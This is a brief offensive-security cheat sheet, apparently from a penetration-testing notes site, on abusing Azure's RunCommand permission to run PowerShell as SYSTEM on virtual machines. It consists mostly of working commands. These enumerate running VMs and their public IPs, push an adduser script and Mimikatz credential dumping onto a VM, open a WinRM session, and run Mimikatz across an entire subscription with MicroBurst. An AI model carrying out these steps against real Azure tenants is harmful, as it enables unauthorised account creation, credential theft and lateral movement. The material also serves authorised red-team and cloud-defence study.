Azure Services - Virtual Machine

RunCommand

Allow anyone with "Contributor" rights to run PowerShell scripts on any Azure VM in a subscription as NT Authority\System

Requirements: Microsoft.Compute/virtualMachines/runCommand/action

• List available Virtual Machines

  PS C:\> Get-AzureRmVM -status | where {$_.PowerState -EQ "VM running"} | select ResourceGroupName,Name
  ResourceGroupName    Name       
  -----------------    ----       
  TESTRESOURCES        Remote-Test
  

• Get Public IP of VM by querying the network interface

  PS AzureAD> Get-AzVM -Name <RESOURCE> -ResourceGroupName <RG-NAME> | select -ExpandProperty NetworkProfile
  PS AzureAD> Get-AzNetworkInterface -Name <RESOURCE368>
  PS AzureAD> Get-AzPublicIpAddress -Name <RESOURCEIP>
  

• Execute Powershell script on the VM, like adduser

  PS AzureAD> Invoke-AzVMRunCommand -VMName <RESOURCE> -ResourceGroupName <RG-NAME> -CommandId 'RunPowerShellScript' -ScriptPath 'C:\Tools\adduser.ps1' -Verbose
  PS Azure C:\> Invoke-AzureRmVMRunCommand -ResourceGroupName TESTRESOURCES -VMName Remote-Test -CommandId RunPowerShellScript -ScriptPath Mimikatz.ps1
  

• Finally you should be able to connect via WinRM

  $password = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
  $creds = New-Object System.Management.Automation.PSCredential('username', $Password)
  $sess = New-PSSession -ComputerName <IP> -Credential $creds -SessionOption (New-PSSessionOption -ProxyAccessType NoProxyServer)
  Enter-PSSession $sess
  

Against the whole subscription using MicroBurst.ps1

Import-module MicroBurst.psm1
Invoke-AzureRmVMBulkCMD -Script Mimikatz.ps1 -Verbose -output Output.txt

References

• Running Powershell scripts on Azure VM - Karl Fosaaen - November 6, 2018

Share this content